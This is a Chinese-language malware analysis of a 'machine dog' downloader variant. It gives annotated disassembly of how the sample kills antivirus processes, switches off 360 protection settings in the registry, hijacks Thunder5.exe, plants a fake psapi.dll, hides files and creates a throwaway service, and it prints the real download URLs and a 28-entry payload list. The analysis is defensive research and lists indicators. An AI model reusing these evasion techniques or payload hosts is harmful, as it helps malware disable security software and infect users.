一、病毒标签:
病毒名称: 机器狗最新变种
病毒类型: 下载者
文件SHA1: 11e187662e89fdf5c200f8fbab1672558461e0ce
危害等级: 3
文件长度: 脱壳前37,205 字节,脱壳后130,501 字节
受影响系统:Microsoft Windows NT 4.0
Microsoft Windows NT 4.0 Terminal Services Edition
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows Server 2003
开发工具: Microsoft Visual C++ 6.0
加壳类型: FSG 2.0 -> bart/xt
二、病毒描述:
该病毒运行后会关闭杀毒软件,并大量下载病毒、木马。
三、行为分析:
1、遍历进程,创建一个名为 puuyt 的互斥体,并在临时路径下释放名为 98989898 的文件
push ebp ; prologue of start: 1Ch bytes of locals (the function continues past this excerpt)
seg001:00416892 mov ebp, esp
seg001:00416894 sub esp, 1Ch
seg001:00416897 call sub_4167D3 ; enumerate processes (author's annotation); result in eax
seg001:0041689C cmp eax, 0Ah ; compare the result with 10
seg001:0041689F jnb short loc_4168A5 ; >= 10: continue; otherwise return 0 (possibly an analysis-environment check -- inferred)
seg001:004168A1 xor eax, eax
seg001:004168A3 leave
seg001:004168A4 retn
seg001:004168A5 ; ---------------------------------------------------------------------------
seg001:004168A5
seg001:004168A5 loc_4168A5: ; CODE XREF: start+E j
seg001:004168A5 push esi ; hWnd -- IDA label is stale: this is a register save (CreateMutexA takes the next three pushes)
seg001:004168A6 push edi ; lpMsg -- register save, see above
seg001:004168A7 push offset aPuuyt ; "puuyt" -- lpName
seg001:004168AC xor esi, esi ; esi = 0, reused for the NULL/0 arguments below
seg001:004168AE push 1 ; bInitialOwner
seg001:004168B0 push esi ; lpMutexAttributes = NULL
seg001:004168B1 call CreateMutexA ; create the mutex named "puuyt" (single-instance guard; the name is a usable host IoC)
seg001:004168B7 call GetLastError
seg001:004168BD cmp eax, 0B7h ; 0B7h = ERROR_ALREADY_EXISTS (183): another instance already owns the mutex
seg001:004168C2 jnz short loc_4168CB
seg001:004168C4 push esi ; uExitCode = 0
seg001:004168C5 call ExitProcess ; the second instance terminates itself
seg001:004168CB ; ---------------------------------------------------------------------------
seg001:004168CB
seg001:004168CB loc_4168CB: ; CODE XREF: start+31 j
seg001:004168CB mov edi, offset BinaryPathName ; edi = output buffer for the temp path
seg001:004168D0 push edi ; lpBuffer
seg001:004168D1 push 104h ; nBufferLength = MAX_PATH (260)
seg001:004168D6 call __imp_GetTempPathA
seg001:004168DC push offset a98989898 ; "98989898" -- lpString2, appended to the temp path
seg001:004168E1 push edi ; lpString1
seg001:004168E2 call __imp_lstrcatA ; BinaryPathName = <temp path>98989898
seg001:004168E8 push edi ; lpFileName
seg001:004168E9 call sub_4161A0 ; create the file 98989898 in the temp directory (author's annotation)
seg001:004168EE test al, al ; al = success flag returned by sub_4161A0
seg001:004168F0 pop ecx ; discard the pushed argument (cdecl cleanup)
seg001:004168F1 jz short loc_4168FF ; creation failed: skip the file-pointer setup
seg001:004168F3 push edi ; NumberOfBytesWritten -- IDA label is stale; edi still holds the file path
seg001:004168F4 call sub_416849 ; set the file pointer (author's annotation)
2、遍历以下进程,如存在则将其结束;并劫持 Thunder5.exe。
seg001:00415F30 ; kavstart.exe
seg001:00415F30 ;
seg001:00415F30 ; kissvc.exe
seg001:00415F30 ;
seg001:00415F30 ; kmailmon.exe
seg001:00415F30 ;
seg001:00415F30 ; kpfw32.exe
seg001:00415F30 ;
seg001:00415F30 ; kpfwsvc.exe
seg001:00415F30 ;
seg001:00415F30 ; kwatch.exe
seg001:00415F30 ;
seg001:00415F30 ; ccenter.exe
seg001:00415F30 ;
seg001:00415F30 ; ras.exe
seg001:00415F30 ;
seg001:00415F30 ; rstray.exe
seg001:00415F30 ;
seg001:00415F30 ; rsagent.exe
seg001:00415F30 ;
seg001:00415F30 ; ravtask.exe
seg001:00415F30 ;
seg001:00415F30 ; ravstub.exe
seg001:00415F30 ;
seg001:00415F30 ; ravmon.exe
seg001:00415F30 ;
seg001:00415F30 ; ravmond.exe
seg001:00415F30 ;
seg001:00415F30 ; avp.exe
seg001:00415F30 ;
seg001:00415F30 ; 360safebox.exe
seg001:00415F30 ;
seg001:00415F30 ; 360Safe.exe
seg001:00415F30 ;
seg001:00415F30 ; Thunder5.exe
seg001:00415F30 ;
seg001:00415F30 ; rfwmain.exe
seg001:00415F30 ;
seg001:00415F30 ; rfwstub.exe
seg001:00415F30 ;
seg001:00415F30 ; rfwsrv.exe
劫持 Thunder5.exe 所使用的注册表路径:
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
3、修改 360 的注册表键值
seg001:004150AA ; -- fragment: the function's prologue (including the ecx count used by the first copy) is outside the excerpt
seg001:004150AA mov esi, offset aSoftware360saf ; SOFTWARE\360Safe\safemon
seg001:004150AF lea edi, [esp+78h+SubKey] ; copy the subkey string onto the stack (ecx set above the excerpt)
seg001:004150B3 xor eax, eax
seg001:004150B5 rep movsd
seg001:004150B7 movsb
seg001:004150B8 mov ecx, 12h ; zero 12h dwords + 1 word (74 bytes) of var_4B; eax is still 0
seg001:004150BD lea edi, [esp+78h+var_4B]
seg001:004150C1 rep stosd
seg001:004150C3 stosw
seg001:004150C5 lea eax, [esp+78h+hKey]
seg001:004150C9 lea ecx, [esp+78h+SubKey]
seg001:004150CD push eax ; phkResult
seg001:004150CE push ecx ; lpSubKey
seg001:004150CF push 80000002h ; hKey = HKEY_LOCAL_MACHINE
seg001:004150D4 mov dword ptr [esp+84h+Data], 0 ; Data = 0, written to the first six values below
seg001:004150DC mov [esp+84h+var_68], 1 ; var_68 = 1, written to LeakShowed and UDiskAccess
seg001:004150E4 call RegCreateKeyA ; return value is not checked; hKey is used regardless
seg001:004150EA mov eax, [esp+78h+hKey]
seg001:004150EE mov esi, RegSetValueExA ; esi = RegSetValueExA for the eight calls below
seg001:004150F4 lea edx, [esp+78h+Data]
seg001:004150F8 push 4 ; cbData = sizeof(DWORD)
seg001:004150FA push edx ; lpData
seg001:004150FB push 4 ; dwType = REG_DWORD
seg001:004150FD push 0 ; Reserved
seg001:004150FF push offset ValueName ; "MonAccess" -- set to 0
seg001:00415104 push eax ; hKey
seg001:00415105 call esi ; RegSetValueExA
seg001:00415107 mov edx, [esp+78h+hKey]
seg001:0041510B lea ecx, [esp+78h+Data]
seg001:0041510F push 4 ; cbData
seg001:00415111 push ecx ; lpData
seg001:00415112 push 4 ; dwType
seg001:00415114 push 0 ; Reserved
seg001:00415116 push offset aSiteaccess ; "SiteAccess" -- set to 0
seg001:0041511B push edx ; hKey
seg001:0041511C call esi ; RegSetValueExA
seg001:0041511E mov ecx, [esp+78h+hKey]
seg001:00415122 lea eax, [esp+78h+Data]
seg001:00415126 push 4 ; cbData
seg001:00415128 push eax ; lpData
seg001:00415129 push 4 ; dwType
seg001:0041512B push 0 ; Reserved
seg001:0041512D push offset aExecaccess ; "ExecAccess" -- set to 0
seg001:00415132 push ecx ; hKey
seg001:00415133 call esi ; RegSetValueExA
seg001:00415135 mov eax, [esp+78h+hKey]
seg001:00415139 lea edx, [esp+78h+Data]
seg001:0041513D push 4 ; cbData
seg001:0041513F push edx ; lpData
seg001:00415140 push 4 ; dwType
seg001:00415142 push 0 ; Reserved
seg001:00415144 push offset aArpaccess ; "ARPAccess" -- set to 0
seg001:00415149 push eax ; hKey
seg001:0041514A call esi ; RegSetValueExA
seg001:0041514C mov edx, [esp+78h+hKey]
seg001:00415150 lea ecx, [esp+78h+Data]
seg001:00415154 push 4 ; cbData
seg001:00415156 push ecx ; lpData
seg001:00415157 push 4 ; dwType
seg001:00415159 push 0 ; Reserved
seg001:0041515B push offset aWeeken ; "weeken" -- set to 0
seg001:00415160 push edx ; hKey
seg001:00415161 call esi ; RegSetValueExA
seg001:00415163 mov ecx, [esp+78h+hKey]
seg001:00415167 lea eax, [esp+78h+Data]
seg001:0041516B push 4 ; cbData
seg001:0041516D push eax ; lpData
seg001:0041516E push 4 ; dwType
seg001:00415170 push 0 ; Reserved
seg001:00415172 push offset aIeprotaccess ; "IEProtAccess" -- set to 0
seg001:00415177 push ecx ; hKey
seg001:00415178 call esi ; RegSetValueExA
seg001:0041517A lea edx, [esp+78h+var_68] ; from here on lpData points at var_68 (= 1)
seg001:0041517E push 4 ; cbData
seg001:00415180 push edx ; lpData
seg001:00415181 push 4 ; dwType
seg001:00415183 push 0 ; Reserved
seg001:00415185 push offset aLeakshowed ; "LeakShowed" -- set to 1
seg001:0041518A mov eax, [esp+8Ch+hKey] ; 8Ch: five pushes are already on the stack
seg001:0041518E push eax ; hKey
seg001:0041518F call esi ; RegSetValueExA
seg001:00415191 mov edx, [esp+78h+hKey]
seg001:00415195 lea ecx, [esp+78h+var_68]
seg001:00415199 push 4 ; cbData
seg001:0041519B push ecx ; lpData
seg001:0041519C push 4 ; dwType
seg001:0041519E push 0 ; Reserved
seg001:004151A0 push offset aUdiskaccess ; "UDiskAccess" -- set to 1
seg001:004151A5 push edx ; hKey
seg001:004151A6 call esi ; RegSetValueExA
seg001:004151A8 mov eax, [esp+78h+hKey]
seg001:004151AC push eax ; hKey
seg001:004151AD call RegCloseKey ; detection note: writes to HKLM\SOFTWARE\360Safe\safemon by a process other than the product itself are a monitoring point; the value names suggest protection toggles are being switched off (inferred from the names only)
seg001:004151B3 pop edi ; epilogue: 70h bytes of locals (prologue outside the excerpt)
seg001:004151B4 pop esi
seg001:004151B5 add esp, 70h
seg001:004151B8 retn
4、结束 360 相关进程
seg001:00415580 sub esp, 130h ; sub_415580 entry: 130h bytes of locals (the body continues past this excerpt)
seg001:00415586 push ebp
seg001:00415587 push offset aSTO ; "檎卣雄饧嘏蹘迷?
seg001:0041558C call sub_415020 ; in-place string decrypt; plaintext per the author: safeboxTray.exe
seg001:00415591 push offset aIkvfrUc ; "┆嗤銝塑?
seg001:00415596 call sub_415020 ; 360tray.exe
seg001:0041559B push offset aCcR ; "骁余讱卧?
seg001:004155A0 call sub_415020 ; psapi.dll
seg001:004155A5 push offset CommandLine ; "枺?
seg001:004155AA call sub_415020 ; /u
seg001:004155AF add esp, 10h ; pop the four cdecl arguments
seg001:004155B2 push 0 ; th32ProcessID
seg001:004155B4 push 2 ; dwFlags = TH32CS_SNAPPROCESS
seg001:004155B6 call CreateToolhelp32Snapshot
seg001:004155BB mov ebp, eax ; ebp = snapshot handle
seg001:004155BD cmp ebp, 0FFFFFFFFh ; INVALID_HANDLE_VALUE
seg001:004155C0 jz loc_415737
seg001:004155C6 lea eax, [esp+134h+pe]
seg001:004155CA push esi ; register save (Process32First takes the next two pushes)
seg001:004155CB push eax ; lppe
seg001:004155CC push ebp ; hSnapshot
seg001:004155CD mov [esp+140h+pe.dwSize], 128h ; 128h = sizeof(PROCESSENTRY32) (296), required before the first call
seg001:004155D5 call Process32First
seg001:004155DA test eax, eax
seg001:004155DC jz loc_415711
seg001:004155E2 mov esi, lstrcmpiA ; case-insensitive compare of each szExeFile against the decrypted name
seg001:004155E8 lea ecx, [esp+138h+pe.szExeFile]
seg001:004155EC push offset aSTO ; "檎卣雄饧嘏蹘迷?
seg001:004155F1 push ecx ; lpString1
seg001:004155F2 call esi ; lstrcmpiA
seg001:004155F4 test eax, eax
seg001:004155F6 jz short loc_41561B ; the first entry already matches
seg001:004155F8
seg001:004155F8 loc_4155F8: ; CODE XREF: sub_415580+99 j
seg001:004155F8 lea edx, [esp+138h+pe]
seg001:004155FC push edx ; lppe
seg001:004155FD push ebp ; hSnapshot
seg001:004155FE call Process32Next
seg001:00415603 test eax, eax
seg001:00415605 jz loc_415711 ; end of snapshot without a match
seg001:0041560B lea eax, [esp+138h+pe.szExeFile]
seg001:0041560F push offset aSTO ; "檎卣雄饧嘏蹘迷?
seg001:00415614 push eax ; lpString1
seg001:00415615 call esi ; lstrcmpiA
seg001:00415617 test eax, eax
seg001:00415619 jnz short loc_4155F8 ; keep walking until a process named safeboxTray.exe is found
seg001:0041561B
seg001:0041561B loc_41561B: ; CODE XREF: sub_415580+76 j
seg001:0041561B mov ecx, [esp+138h+pe.th32ProcessID]
seg001:0041561F push ebx ; lpFileName -- IDA label is stale: register save (OpenProcess takes the next three pushes)
seg001:00415620 push ecx ; dwProcessId
seg001:00415621 push 0 ; bInheritHandle
seg001:00415623 push 410h ; dwDesiredAccess = PROCESS_QUERY_INFORMATION | PROCESS_VM_READ (400h | 10h)
seg001:00415628 call OpenProcess
seg001:0041562E mov ebx, eax ; ebx = handle to the target process
seg001:00415630 test ebx, ebx
seg001:00415632 jz loc_4156FE
seg001:00415638 lea edx, [esp+13Ch+cbNeeded]
seg001:0041563C push edi ; register save (EnumProcessModules takes the next four pushes)
seg001:0041563D push edx ; lpcbNeeded
seg001:0041563E lea eax, [esp+144h+hObject]
seg001:00415642 push 4 ; cb = sizeof(HMODULE): only the first (main) module handle is requested
seg001:00415644 push eax ; lphModule
seg001:00415645 push ebx ; hProcess
seg001:00415646 call EnumProcessModules
seg001:0041564B mov ecx, [esp+140h+hObject]
seg001:0041564F push 104h ; nSize = MAX_PATH
seg001:00415654 push offset ApplicationName ; lpFilename
seg001:00415659 push ecx ; hModule
seg001:0041565A push ebx ; hProcess
seg001:0041565B call GetModuleFileNameExA ; ApplicationName = full path of the target's main module
seg001:00415660 mov edi, offset ApplicationName ; -- ecx = strlen(ApplicationName) via repne scasb
seg001:00415665 or ecx, 0FFFFFFFFh
seg001:00415668 xor eax, eax
seg001:0041566A mov esi, offset ApplicationName ; esi = copy source for the rep movs below
seg001:0041566F repne scasb
seg001:00415671 not ecx
seg001:00415673 dec ecx
seg001:00415674 mov edi, offset aSTO ; "檎卣雄饧嘏蹘迷? -- now the decrypted exe name; measure it the same way
seg001:00415679 mov edx, ecx ; edx = strlen(full path)
seg001:0041567B or ecx, 0FFFFFFFFh
seg001:0041567E repne scasb
seg001:00415680 not ecx
seg001:00415682 dec ecx ; ecx = strlen(exe name)
seg001:00415683 mov edi, offset FileName
seg001:00415688 sub edx, ecx ; edx = length of the directory prefix (path minus file name)
seg001:0041568A push offset FileName ; lpFileName -- argument for sub_414F40 below
seg001:0041568F mov ecx, edx
seg001:00415691 mov eax, ecx
seg001:00415693 shr ecx, 2 ; memcpy(FileName, ApplicationName, edx): dwords, then the remaining bytes
seg001:00415696 rep movsd
seg001:00415698 mov ecx, eax
seg001:0041569A xor eax, eax
seg001:0041569C and ecx, 3
seg001:0041569F rep movsb ; FileName = "<directory of the target process>\"
seg001:004156A1 mov edi, offset aCcR ; "骁余讱卧? -- decrypted second string (psapi.dll per the author)
seg001:004156A6 or ecx, 0FFFFFFFFh
seg001:004156A9 repne scasb
seg001:004156AB not ecx ; ecx = strlen + 1 (terminator included)
seg001:004156AD sub edi, ecx ; edi back to the start of the string
seg001:004156AF mov esi, edi ; esi = copy source
seg001:004156B1 mov edx, ecx ; edx = bytes to copy
seg001:004156B3 mov edi, offset FileName
seg001:004156B8 or ecx, 0FFFFFFFFh
seg001:004156BB repne scasb ; locate FileName's terminator
seg001:004156BD mov ecx, edx
seg001:004156BF dec edi ; edi = address of the NUL, so the copy appends
seg001:004156C0 shr ecx, 2
seg001:004156C3 rep movsd
seg001:004156C5 mov ecx, edx
seg001:004156C7 and ecx, 3
seg001:004156CA rep movsb ; FileName = "<target directory>\psapi.dll": a file named after a system DLL inside the security product's own directory -- consistent with DLL planting (inferred); its appearance there is a detection point
seg001:004156CC call sub_414F40 ; takes FileName; returns a byte flag in al
seg001:004156D1 add esp, 4 ; pop the argument
seg001:004156D4 test al, al ; branch on the result (the excerpt ends here)
5、在 C:\WINDOWS\Tasks 下释放名为 1 的文件,该文件实际上是一个 dll,其主要功能是从 http://{blocked}www.hoho-2.cn/down/gr.exe 下载病毒(下载者行为)
seg001:0041691D call sub_41630E ; drops the file "1" under C:\WINDOWS\Tasks (author's annotation)
6、创建线程遍历磁盘分区,查找 exe 文件
push esi ; lpThreadId -- esi supplies every NULL/0 argument here (its value is set above the excerpt; presumably 0)
seg001:0041692B push esi ; dwCreationFlags
seg001:0041692C push esi ; lpParameter
seg001:0041692D push offset find_file_exe ; lpStartAddress -- thread body that walks the drives for .exe files (author's label)
seg001:00416932 push esi ; dwStackSize
seg001:00416933 push esi ; lpThreadAttributes
seg001:00416934 call CreateThread ; the drive scan runs on its own thread
7、查找AfxControlBar42s窗口,修改注册表键值,关闭“显示隐藏文件”
push 7D0h ; dwMilliseconds = 2000 (2 s)
seg001:00416205 call Sleep
seg001:0041620B push offset szWindow ; lpszWindow
seg001:00416210 push offset szClass ; "AfxControlBar42s"
seg001:00416215 call sub_416070 ; locate the window of class "AfxControlBar42s" (author's annotation)
seg001:0041621A pop ecx ; discard the two cdecl arguments
seg001:0041621B pop ecx
seg001:0041621C call sub_4160ED ; modify registry values (author's annotation)
seg001:00416221 jmp short modify_reg ; target label is outside the excerpt; the author's labelling suggests this repeats -- unverified
进入 sub_4160ED(修改注册表值)后的代码如下:
mov esi, offset aSoftwareMicr_0 ; Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced -- per-user Explorer folder-view settings
seg001:004160FC pop ecx ; ecx = dword count for the copy (pushed above the excerpt)
seg001:004160FD lea edi, [ebp+SubKey]
seg001:00416100 rep movsd ; copy the subkey string onto the stack
seg001:00416102 push 9
seg001:00416104 xor eax, eax
seg001:00416106 pop ecx ; ecx = 9: zero 9 dwords + 1 word of var_38
seg001:00416107 lea edi, [ebp+var_38]
seg001:0041610A rep stosd
seg001:0041610C stosw
seg001:0041610E and [ebp+var_10], 0 ; var_10 = 0 -> written to "ShowSuperHidden"
seg001:00416112 mov dword ptr [ebp+Data], 2 ; Data = 2 -> written to "Hidden" (2 = "Do not show hidden files")
seg001:00416119 stosb ; one more zero byte after the cleared area
seg001:0041611A lea eax, [ebp+hKey]
seg001:0041611D mov [ebp+var_C], 1 ; var_C = 1 -> written to "SuperHidden"
seg001:00416124 push eax ; phkResult
seg001:00416125 lea eax, [ebp+SubKey]
seg001:00416128 push eax ; lpSubKey
seg001:00416129 push 80000001h ; hKey = HKEY_CURRENT_USER
seg001:0041612E call RegCreateKeyA ; return value is not checked
seg001:00416134 push 4
seg001:00416136 lea eax, [ebp+Data]
seg001:00416139 pop edi ; edi = 4, reused as both cbData and dwType (REG_DWORD)
seg001:0041613A mov esi, RegSetValueExA
seg001:00416140 push edi ; cbData
seg001:00416141 push eax ; lpData
seg001:00416142 push edi ; dwType
seg001:00416143 push 0 ; Reserved
seg001:00416145 push offset aHidden ; "Hidden" -- = 2
seg001:0041614A push [ebp+hKey] ; hKey
seg001:0041614D call esi ; RegSetValueExA
seg001:0041614F lea eax, [ebp+var_C]
seg001:00416152 push edi ; cbData
seg001:00416153 push eax ; lpData
seg001:00416154 push edi ; dwType
seg001:00416155 push 0 ; Reserved
seg001:00416157 push offset aSuperhidden ; "SuperHidden" -- = 1
seg001:0041615C push [ebp+hKey] ; hKey
seg001:0041615F call esi ; RegSetValueExA
seg001:00416161 lea eax, [ebp+var_10]
seg001:00416164 push edi ; cbData
seg001:00416165 push eax ; lpData
seg001:00416166 push edi ; dwType
seg001:00416167 push 0 ; Reserved
seg001:00416169 push offset aShowsuperhidde ; "ShowSuperHidden" -- = 0 (protected operating-system files stay hidden)
seg001:0041616E push [ebp+hKey] ; hKey
seg001:00416171 call esi ; RegSetValueExA
seg001:00416173 push [ebp+hKey] ; hKey
seg001:00416176 call RegCloseKey ; net effect: Explorer no longer displays hidden or protected files, so the dropped files stay out of sight
seg001:0041617C pop edi ; epilogue; the excerpt ends before retn
seg001:0041617D pop esi
seg001:0041617E leave
8、结束 cmd.exe 进程
push offset Str1 ; "cmd.exe" -- compared against the current entry's image name (the other _stricmp argument is pushed above the excerpt)
seg001:00414B47 call _stricmp ; case-insensitive compare
seg001:00414B4C pop ecx ; discard the two cdecl arguments
seg001:00414B4D test eax, eax
seg001:00414B4F pop ecx
seg001:00414B50 jnz short loc_414B33 ; no match: next entry (loop head outside the excerpt)
seg001:00414B52 push dword ptr [esi+8] ; dwProcessId -- esi presumably points at a PROCESSENTRY32 (th32ProcessID is at +8) -- inferred
seg001:00414B55 push eax ; bInheritHandle -- eax is 0 here because the compare matched
seg001:00414B56 push 1 ; dwDesiredAccess = PROCESS_TERMINATE
seg001:00414B58 call OpenProcess
seg001:00414B5E push 0 ; uExitCode
seg001:00414B60 push eax ; hProcess -- not checked for NULL
seg001:00414B61 call TerminateProcess ; every process named cmd.exe is killed
9、释放随机命名的 dll 文件
seg001:00415E30 push eax ; lpBuffer -- presumably &Buffer (set above the excerpt)
seg001:00415E31 push 104h ; nBufferLength = MAX_PATH
seg001:00415E36 call __imp_GetTempPathA ; Buffer = temp path (author's annotation)
seg001:00415E3C call __imp_GetTickCount ; eax = milliseconds since boot, used as the file name
seg001:00415E42 push eax ; %x
seg001:00415E43 lea eax, [ebp+Buffer]
seg001:00415E49 push eax ; %s
seg001:00415E4A mov esi, offset byte_4169EC ; esi = destination buffer for the formatted path
seg001:00415E4F push offset aSX_dll ; "%s%x.dll"
seg001:00415E54 push esi ; LPSTR
seg001:00415E55 call wsprintfA ; byte_4169EC = "<temp path><hex tick count>.dll" -- the name is not a stable IoC; hunt on the pattern instead
seg001:00415E5B push esi ; lpFileName
seg001:00415E5C call sub_414AB4 ; drop the randomly named dll (author's annotation)
seg001:00415E61 add esp, 14h ; pop five dword arguments (wsprintfA's four plus sub_414AB4's one)
10、下载者列表:
seg001:00415E71 push offset aOlojvssfysgvqn ; "防蕉}ol様YS儌QNLI>px6kfrhYX P_Y" -- encrypted URL
seg001:00415E76 call sub_414FA0 ; decrypt; plaintext per the author: http://tongji1.ac5566.cn/getmac.asp
seg001:00415E7B mov [esp+114h+var_114], offset dword_4144EC ; argument written into the top stack slot instead of pushed
seg001:00415E82 call sub_414FA0 ; decrypt; plaintext per the author: http://txt.naiws.com/oo.txt
seg001:00415E87 call sub_415750 ; download every entry of the list via URLDownloadToFileA (author's annotation)
seg001:00415E8C mov esi, Sleep
seg001:00415E92 mov [esp+114h+var_114], 0C350h ; dwMilliseconds = 50000 (50 s)
seg001:00415E99 call esi ; Sleep
seg001:00415E9B push offset dword_4145C0
seg001:00415EA0 call sub_414FA0 ; decrypt; plaintext per the author: http://txt.naiws.com/ad.jpg
seg001:00415EA5 pop ecx ; discard the argument
seg001:00415EA6 call sub_415BE0 ; modify the hosts file (author's annotation)
seg001:00415EAB call sub_4151DD ; further decryption; collects NetBIOS information (author's annotation)
seg001:00415EB0 mov edi, 1F4h ; 500 ms
seg001:00415EB5 push edi ; dwMilliseconds -- the Sleep call follows outside the excerpt
sadfasdf.jpg 实际上是一个下载列表文件,内容如下:
[file]
open=y
url1=http://www.wixks.com/new/new1.exe
url2=http://www.wixks.com/new/new2.exe
url3=http://www.wixks.com/new/new3.exe
url4=http://www.wixks.com/new/new4.exe
url5=http://www.wixks.com/new/new5.exe
url6=http://www.wixks.com/new/new6.exe
url7=http://www.wixks.com/new/new7.exe
url8=http://www.wixks.com/new/new8.exe
url9=http://www.wixks.com/new/new9.exe
url10=http://www.wixks.com/new/new10.exe
url11=http://www.wixks.com/new/new11.exe
url12=http://www.wixks.com/new/new12.exe
url13=http://www.wixks.com/new/new13.exe
url14=http://www.wixks.com/new/new14.exe
url15=http://www.wixks.com/new/new15.exe
url16=http://www.wixks.com/new/new16.exe
url17=http://www.wixks.com/new/new17.exe
url18=http://www.wixks.com/new/new18.exe
url19=http://www.wixks.com/new/new19.exe
url20=http://www.wixks.com/new/new20.exe
url21=http://www.wixks.com/new/new21.exe
url22=http://www.wixks.com/new/new22.exe
url23=http://www.wixks.com/new/new23.exe
url24=http://www.wixks.com/new/new24.exe
url25=http://www.wixks.com/new/new25.exe
url26=http://www.wixks.com/new/new26.exe
url27=http://www.wixks.com/new/new27.exe
url28=http://www.wixks.com/new/new28.exe
count=28
11、提权
call sub_416223 ; privilege elevation (author's annotation)
12、创建一个名为 Kisstusb 的服务,完成后清除该服务
seg001:004166C9 push offset ServiceName ; "Kisstusb"
seg001:004166CE call sub_416402 ; create the service named "Kisstusb" (author's annotation); returns the service handle in eax
seg001:004166D3 mov esi, eax
seg001:004166D5 pop ecx ; discard the two cdecl arguments (the other push is above the excerpt)
seg001:004166D6 test esi, esi
seg001:004166D8 pop ecx
seg001:004166D9 jz short loc_416702 ; creation failed: go straight to cleanup
seg001:004166DB lea eax, [ebp+ServiceStatus]
seg001:004166DE push eax ; lpServiceStatus
seg001:004166DF push esi ; hService
seg001:004166E0 call QueryServiceStatus
seg001:004166E6 test eax, eax
seg001:004166E8 jz short loc_4166F0
seg001:004166EA cmp [ebp+ServiceStatus.dwCurrentState], 4 ; 4 = SERVICE_RUNNING
seg001:004166EE jz short loc_4166FB ; already running: do not start it again
seg001:004166F0
seg001:004166F0 loc_4166F0: ; CODE XREF: sub_4166BF+29 j
seg001:004166F0 push 0 ; lpServiceArgVectors
seg001:004166F2 push 0 ; dwNumServiceArgs
seg001:004166F4 push esi ; hService
seg001:004166F5 call StartServiceA ; start the service (author's annotation)
seg001:004166FB
seg001:004166FB loc_4166FB: ; CODE XREF: sub_4166BF+2F j
seg001:004166FB push esi ; hSCObject
seg001:004166FC call CloseServiceHandle
seg001:00416702
seg001:00416702 loc_416702: ; CODE XREF: sub_4166BF+1A j
seg001:00416702 push [ebp+lpBinaryPathName] ; lpFileName -- presumably the service binary
seg001:00416705 call DeleteFileA ; remove the file from disk once the service has been started
seg001:0041670B push offset pszSubKey ; SYSTEM\CurrentControlSet\Services\Kisstusb
seg001:00416710 push 80000002h ; hkey = HKEY_LOCAL_MACHINE
seg001:00416715 call SHDeleteKeyA ; delete the service key directly rather than via the SCM (author: clear the service); the service-install event and the key deletion are the remaining forensic traces